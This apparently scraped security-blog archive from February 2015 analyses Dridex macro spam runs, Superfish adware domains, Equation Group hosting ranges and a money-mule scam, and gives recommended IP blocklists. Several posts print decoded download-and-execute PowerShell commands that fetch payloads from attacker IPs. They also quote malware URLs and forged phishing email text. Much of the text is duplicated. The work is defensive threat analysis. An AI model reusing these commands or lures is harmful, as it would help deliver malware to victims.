In the light of the growing Lenovo / Superfish fuss, I set out to identify those Superfish domains and IPs that I could, for the purposes of blocking or monitoring.
The domains and IPs that I have been able to identify are here [csv].
Superfish appear to operate the following domains (and several subdomains thereof):
venn.me
best-deals-products.com
superfish.com
pin2buy.net
pintobuy.net
similarproducts.net
adowynel.com
govenn.com
group-albums.com
jewelryviewer.com
likethatapps.com
likethatdecor.com
likethatpet.com
likethatpets.com
testsdomain.info
superfish.mobi
vennit.net
superfish.us
These following IP addresses and ranges appear to be used exclusively by Superfish (some of their other domains are on shared infrastructure).
66.70.35.240/28
66.70.34.64/26
66.70.34.128/26
66.70.34.251
66.70.35.12
66.70.35.48
All of those IPs are allocated to Datapipe in the US. Superfish itself is based in Israel, which seems to be a popular place to develop adware.
Do with this data what you will, if you have any more IPs or domains then perhaps you might share them in the Comments.
Thursday 19 February 2015
Wednesday 18 February 2015
Multiple spam emails using malicious XLS or XLSM attachment
I'm seeing multiple spam runs (probably pushing the Dridex banking trojan) with no body text, various subjects and either an XLS or XLSM attachment.
Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]
Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm
The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.
Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:
For information, these IPs are hosted by:
5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)
This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:
82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63
For research purposes, a copy of the files analysed and dropped can be found here, password is infected
Example subjects include:
Copy [ID:15E376774] attaced
RE: Requests documentation [458C28133]
Request error [C3843]
Request error [FDF396530]
Requests documentation [242B035667]
Attachments look something similar to this:
15E376774.xlsm
242B035667.xlsm
458C28133.xls
C3843.xls
FDF396530.xlsm
The XLS and XLSM files are different structurally.. the XLSM files are basically an Office 2007 ZIP archive of all the data components, the XLS files are an old school Office 2003 file. Nevertheless, they contain a macro with 23 components to make it harder to analyse, although the important modules are Module 11 which contains the text string to decrypt, and Module 14 which contains the decryption function itself. Almost everything else is irrelevant.
Once the string is decrypted, it becomes fairly obvious what it going on. So far, there appear to be four strings with different download locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.243.7/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;So, we can see a file dxzq.jpg being downloaded which is actually a CAB file (JIOiodfhioIH.cab) which is then expanded to JIOiodfhioIH.exe and then run.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.30.42.151/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://176.31.28.235/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
For information, these IPs are hosted by:
5.196.243.7 (OVH, Ireland)
46.30.42.151 (Eurobtye LLC, Russia)
176.31.28.235 (OVH, France)
92.63.88.63 (MWTV, Latvia)
This executable has a detection rate of 4/56. Automated analysis [1] [2] [3] shows attempted network connections to:
82.151.131.129 (Doruknet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)
The Malwr report shows that it also drops a DLL with a detection rate of just 1/56.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
5.196.243.7
46.30.42.151
176.31.28.235
92.63.88.63
For research purposes, a copy of the files analysed and dropped can be found here, password is infected
Malware spam: "UK Fuels Esso E-bill" / "invoices@ebillinvoice.com"
This fake invoice is a forgery with a malicious attachment:
From: invoices@ebillinvoice.comI have only seen a single sample of this, with a ZIP file 36890_06_2015.zip attached, which in turn contains a document 36890_06_2015.doc. This document contains a malicious macro, and is exactly the same as the one used in this campaign leading to the Dridex banking trojan.
Date: 18 February 2015 at 09:01
Subject: UK Fuels Esso E-bill
Customer No : 90714
Email address : [redacted]
Attached file name : 36890_06_2015.DOC (ZIP)
Dear Customer
Please find attached your invoice for Week 06 2015.
If you have any queries regarding your e-bill you can contact us at invoices@ebillinvoice.com.
Alternatively you can log on to your account at www.velocitycardmanagement.com to review your transactions and manage your account online.
Yours sincerely
Customer Services
UK Fuels
======================================================
This email, its content and any files transmitted with
it are confidential and intended solely for the use of
the individual(s) to whom it is addressed.
If you are not the intended recipient, be advised that
you have received this email in error and that any use,
dissemination, forwarding, printing or copying of
this email is strictly prohibited.
======================================================
Malware spam: "[dan@express-insurance.net]" / "Auto insurance apps and documents"
This fake financial spam has a malicious attachment:
This spam does not actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple forgery with a malicious Word document attached.
There are actually at least two different versions of the document with zero detections [1] [2]. The macros are a bit too complex for pastebin, but you can download a ZIP here and here [password=infected].
Despite the difference, both seem to download from:
http://ecv.bookingonline.it/js/bin.exe
The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] indicate that it attempts to phone home to:
83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.
Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66
From: Dan Bigelow [dan@express-insurance.net]
Date: 18 February 2015 at 09:18
Subject: Auto insurance apps and documents
Hello ,Please print “All” attached forms and sign and initial where I highlighted.Scan and email back to me or fax to me at 407-937-0511.Sincerely,Dan BigelowReferrals are important to us. If you know anyone who would benefit from our services, please contact me.We would appreciate the opportunity to work with them.
2636 West State Rd 434 # 112Longwood, Fl 32779Phone 407-215-7318Fax 407-386-1601
This spam does not actually come from Express Insurance nor have their systems or data been compromised in any way. Instead this is a simple forgery with a malicious Word document attached.
There are actually at least two different versions of the document with zero detections [1] [2]. The macros are a bit too complex for pastebin, but you can download a ZIP here and here [password=infected].
Despite the difference, both seem to download from:
http://ecv.bookingonline.it/js/bin.exe
The download file is saved as %TEMP%\FfdgF.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] indicate that it attempts to phone home to:
83.169.4.178 (Hosteurope, Germany)
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
This probably drops a Dridex DLL, however the Malwr analysis appears to have malfunctioned and I don't have a sample.
Recommended blocklist:
83.169.4.178
202.44.54.5
66.110.179.66
Tuesday 17 February 2015
An analysis of reported Equation Group IP ranges and domains
There has been a lot of buzz this morning about "The Equation Group", a possible state actor involved in placing malware on hard disks [1] [2] [3] [4].
Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they a hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.
Securelist post a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.
The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.
There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.
(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)
80.77.2.160/27
80.77.4.0/26
Allegedly a partner of the NSA and GCHQ, these IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:
team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com
195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27
Another company with a long history with the NSA, these Verizon IPs are all located outside the United States, specfically the Netherlands, Singaporre, Japana and Italy. In addition to hardcoded IPs, they are hosting:
honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com
This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:
avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com
190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28
The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:
selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com
81.31.34.174
81.31.34.175
81.31.38.160/27
A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:
islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
Terremark also provide hosting services for Equation in Colmbia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:
businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.
arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com
124.217.250.128/27
124.217.253.61
124.217.253.64/29
Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.
roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com
64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70
I recommend that you look at the data before you do drastic things with these IP ranges.
Now, I don't know for certain that this malware is a government actor, but the IP address indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me..
Securelist (in conjunction with Kaspersky) published a list of domains and IPs to do with this malware, but with very little information about where they were hosted. After all, if they a hosted in a shed next to the bus station in Tiraspol or some underground complex buried under Wutong Mountain, then it's a rather different proposition from some secretive organisation in Washington DC.
Securelist post a number of hardcoded IPs as well as some domain names. Kaspersky have sinkholed some of the domains, and I can see one other active sinkhole. At least one of the domains is parked. Some of the domains look like they are not in use.
The data I collected can be found here, but before you use any of it, I will explain in more detail so you can use it prudently.
There are several web hosts and networks involved, all over the world. Some seem to have a higher certainty of involvement than others. In most cases, the Equation Group have rented a bunch of servers with contiguous IP addresses (I call this the "Equation Range") which is the one that I recommend you monitor. Some web hosts have other suspect IP addresses in the same neighbourhood, but in order to keep things simple I am not going into that.
(Updated 18/2/15 to remove an OpenDNS sinkhole and add 41.222.35.70)
FLAG Telecom / Reliance Globalcom
62.216.152.64/2880.77.2.160/27
80.77.4.0/26
Allegedly a partner of the NSA and GCHQ, these IP addresses appear to be in the UK, US and Egypt (I would doubt the accuracy of the WHOIS data for the last one). In addition to apparently hardcoded IPs, they also host:
team4heat.net
forgotten-deals.com
phoneysoap.com
cigape.net
mimicrice.com
charmedno1.com
functional-business.com
rehabretie.com
advancing-technology.com
crisptic01.net
tropiccritics.com
cribdare2no.com
following-technology.com
teatac4bath.com
Verizon
194.229.238.80/28195.108.238.128/30
195.128.235.225/28
202.95.84.32/27
210.81.52.96/27
212.177.108.192/27
Another company with a long history with the NSA, these Verizon IPs are all located outside the United States, specfically the Netherlands, Singaporre, Japana and Italy. In addition to hardcoded IPs, they are hosting:
honarkhaneh.net
meevehdar.com
parskabab.com
ad-noise.net
ad-void.com
aynachatsrv.com
damavandkuh.com
fnlpic.com
monster-ads.net
nowruzbakher.com
sherkhundi.com
quickupdateserv.com
goodbizez.com
www.dt1blog.com
www.forboringbusinesses.com
timelywebsitehostesses.com
technicads.com
darakht.com
ghalibaft.com
adservicestats.com
downloadmpplayer.com
honarkhabar.com
techsupportpwr.com
webbizwild.com
zhalehziba.com
Global Telecom & Technology Americas Inc. / Cogent / PSInet
149.12.71.0/26This Cogent customer has at least four different IPs hosting Equation Group servers. The following domains are hosted:
avidnewssource.com
rubi4edit.com
listennewsnetwork.com
unite3tubes.com
Colombia: Alfan Empaques Flexibles S.A. / Columbus Networks / IFX Networks / Terremark
64.76.82.48/28190.242.96.208/28
190.60.202.0/28
190.60.202.0/28
190.60.202.0/28
The relationship between the US and Colombia is difficult, with the former spying on the latter extensively. Why there should be a cluster of servers in Colombia connected with this is a mystery. In addition to hardcoded IPs, the following domains are hosted in Colombia:
selective-business.com
technicalconsumerreports.com
technicaldigitalreporting.com
technology-revealed.com
melding-technology.com
Czech Republic: Master Internet / IT-PRO / 4D Praha
81.31.36.160/2881.31.34.174
81.31.34.175
81.31.38.160/27
A group of three internet companies (possibly using the same infrastructure) also appear to be involved. All these IPs appear to be in the city of Brno, which is also home to the Czech National Cyber Security Center. Coincidence? The following domains can be found on Czech IPs in addition to hardcoded addresses:
islamicmarketing.net
noticiasftpsrv.com
coffeehausblog.com
platads.com
nickleplatedads.com
arabtechmessenger.net
Spain: Terremark / GTT Global Telecom
84.233.205.96/2784.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
Terremark also provide hosting services for Equation in Colmbia, and of course Spain is a long-time ally of the United States and United Kingdom. Web sites hosted:
businessedgeadvance.com
business-made-fun.com
rampagegramar.com
unwashedsound.com
businessdealsblog.com
industry-deals.com
itemagic.net
posed2shade.com
slayinglance.com
rubiccrum.com
rubriccrumb.com
Netherlands: Tripartz-Atrato / IX Reach / Claranet / FiberRing
212.61.54.224/2787.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
In addition to Verizon, four other Netherlands companies are hosting Equation Group servers. The Netherlands is another long-time ally of the US and UK.
arm2pie.com
businessdirectnessource.com
housedman.com
taking-technology.com
micraamber.net
charging-technology.com
brittlefilet.com
dowelsobject.com
speedynewsclips.com
Malaysia: Piradius NET
124.217.228.56/29124.217.250.128/27
124.217.253.61
124.217.253.64/29
Often appearing to be a "go-to" company if you want to set up a Black Hat reseller, these domains and IPs look like they have been picked up as part of a commercial offering.
roshanavar.com
adsbizsimple.com
bazandegan.com
amazinggreentechshop.com
foroushi.net
technicserv.com
afkarehroshan.com
thesuperdeliciousnews.com
sherkatkonandeh.com
mashinkhabar.com
Other ranges and hosts
- RACSA in Costa Rica hosts customerscreensavers.com and xlivehost.com on 196.40.84.8/29.
- EasySpeed in Denmark hosts quik-serv.com and goldadpremium.com on 82.103.134.48/30.
- Cyber Cast International in Panama hosts havakhosh.com and toofanshadid.com on 200.115.174.254.
- EM Technologies in Panama hosts technicupdate.com and rapidlyserv.com on 201.218.238.128/26.
- INET in Thailand hosts globalnetworkanalys.com on 203.150.231.49 with an apparently hardcoded IP of 203.150.231.73 in use as well.
- American Internet Services hosts suddenplot.com on 207.158.58.102.
- GoDaddy hosts serv-load.com and wangluoruanjian.com on 97.74.104.208.
- Quadranet / GZ Systems hosts fliteilex.com plus some other questionable domains on 67.215.237.104/29.
- Vegas Linkup LLC hosts standardsandpraiserepurpose.com on 209.59.42.97.
- Vox Telecom in South Africa hosts mysaltychocolateballs.com on 41.222.35.70 having previously hosted forboringbusinesses.com.
64.76.82.48/28
190.242.96.208/28
190.60.202.0/28
69.42.114.96/28
196.40.84.8/29
81.31.36.160/28
81.31.34.174
81.31.34.175
81.31.38.160/27
82.103.134.48/30
80.77.2.160/27
84.233.205.96/27
84.233.205.160/28
195.81.34.64/27
84.233.205.32/28
85.112.1.80/28
212.177.108.192/27
210.81.52.96/27
124.217.228.56/29
124.217.250.128/27
124.217.253.61
124.217.253.64/29
212.61.54.224/27
87.255.34.240/28
87.255.38.0/28
89.18.177.0/27
80.94.78.53
80.94.78.109
194.229.238.80/28
195.108.238.128/30
195.128.235.225/28
200.115.174.254
201.218.238.128/26
202.95.84.32/27
203.150.231.49
203.150.231.73
62.216.152.64/28
207.158.58.102
149.12.71.0/26
80.77.4.0/26
97.74.104.208
67.215.237.104/29
209.59.42.97
41.222.35.70
I recommend that you look at the data before you do drastic things with these IP ranges.
Now, I don't know for certain that this malware is a government actor, but the IP address indicate that whoever it is has a relationship with these companies (especially Verizon). That certainly feels like a state actor to me..
Labels:
Amazon,
Colombia,
Czech Republic,
GoDaddy,
Malware,
Netherlands,
Panama,
Piradius.net,
Spain
Something evil on 92.63.88.0/24 (MWTV, Latvia)
I've been tracking Dridex for some time, and I keep seeing IPs for MWTV in Latvia cropping up. So far I have seen:
92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108
I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.
92.63.88.87
92.63.88.97
92.63.88.100
92.63.88.105
92.63.88.106
92.63.88.108
I'm not sure how widely this spreads through the MWTV network, but I would certainly recommend blocking 92.63.88.0/24 on your network perimeter.
Labels:
Dridex,
Evil Network,
Latvia,
Malware
Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"
This fake financial document has a malicious attachment:
uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr
Which decodes to:
http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe
This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)
According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.
Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105
From: AR.Support@efi.comAttached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2] that actually just perform a ROT13 transformation on a couple of strings.
To: minutemanpresschicago@comcast.net
Date: 17 February 2015 at 10:22
Subject: Customer statement 0001031389 as on 02/05/2015
Dear EFI Customer,
Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.
Regards,
AR Support
AR.Support@efi.com
** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.
PO Box 742366
Los Angeles, CA. 90074-2366
Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.
uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr
Which decodes to:
http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe
This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] shows the malware attempting to connect to:
202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)
According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.
Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105
Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex
This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment
3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls
There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).
When we decrypt the strings in the macro, we see:
These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)
Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV, Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at 92.63.88.87.
ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)
This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243
Date: 17 February 2015 at 14:05Some example attachment names are:
Subject: Unpaid invoice [ID:9876543210]
3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls
There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).
When we decrypt the strings in the macro, we see:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)
Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV, Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at 92.63.88.87.
ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)
This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.
Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243
Monday 16 February 2015
Money mule scam: gbearn.com / usaearns.com
This spam email is attempting to recruit people to aid with money laundering ("money mules") and other illegal operations.
Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1.recognizettrauma.net). The other nameserver (ns2.recognizettrauma.net) is on 75.132.186.90 (Charter Communications, US).
Be in no doubt that the job being offered here is illegal, and you should most definitely avoid it.
Date: 16 February 2015 at 21:29The reply-to address of gbearn.com has recently been registered by the scammers with false WHOIS details. There is also an equivalent domain usaearns.com for recruiting US victims.
Subject: New offer
Good day!
We considered your resume to be very attractive and we thought the vacant position in our company could be interesting for you.
Our firm specializes in advertisment services realizing unique products of creative advertising and branding strategies
and solutions to develop a distinctive brand value.
We cooperate with different countries and currently we have many clients in the USA and the EU.
Due to this fact, we need to increase the number of our destination representatives' regular staff.
In their duties will be included the document and payment control of our clients.
Part-time employment is currently important.
We offer a wage from 3500 GBP per month.
If you are interested in our offer, mail to us your answer on riley@gbearn.com and
we will send you an extensive information as soon as possible.
Respectively submitted
Personnel department
Although there is no website, both domains have a mail server at 93.188.167.170 (Hostinger, US) which also serves as one of the nameservers for these domains (ns1.recognizettrauma.net). The other nameserver (ns2.recognizettrauma.net) is on 75.132.186.90 (Charter Communications, US).
Be in no doubt that the job being offered here is illegal, and you should most definitely avoid it.
Labels:
Job Offer Scams,
Spam
Malware spam: "L&A Plastic Order# 66990" / "Hannah [Hannah@lapackaging.com]"
This fake financial spam does not come from LA Packaging, their systems are not compromised in any way. Instead, this is a simple forgery with a malicious attachment:
http://hoodoba.cba.pl/js/bin.exe
At present this has a detection rate of 6/57. It is the same malware as seen in this spam run.
From: Hannah [Hannah@lapackaging.com]Attached is a malicious Word document 66990.doc - so far I have only seen one version of this, although there are usually several variants. This document contains a macro [pastebin] which downloads an executable from:
Date: 16 February 2015 at 10:38
Subject: L&A Plastic Order# 66990
For your records, please see attached L&A Order# 66990 and credit card receipt.
It has shipped today via UPS Ground Tracking# 1Z92X9070369494933
Best Regards,
Hannah – Sales
L&A Plastic Molding / LA Packaging
714-694-0101 Tel - Ext. 110
714-694-0400 Fax
E-mail: Hannah@LAPackaging.com
http://hoodoba.cba.pl/js/bin.exe
At present this has a detection rate of 6/57. It is the same malware as seen in this spam run.
Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"
This rather terse spam comes with a a malicious attachment:
869B54732.xls
BE75129513.xls
C39189051.xls
None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):
It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:
85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)
It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.
Recommended blocklist:
85.143.166.72
205.185.119.159
92.63.88.87
173.226.183.204
27.5.199.115
149.171.76.124
46.19.143.151
From: Rosemary GibbsThe sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are
Date: 16 February 2015 at 10:12
Subject: Re: Data request [ID:91460-2234721]
Copy of transaction.
869B54732.xls
BE75129513.xls
C39189051.xls
None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this (click to enlarge):
It's quite apparent that this is ROT13 encoded which you can easily decrypt at rot13.com rather than working through the macro. These three samples give us:
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"
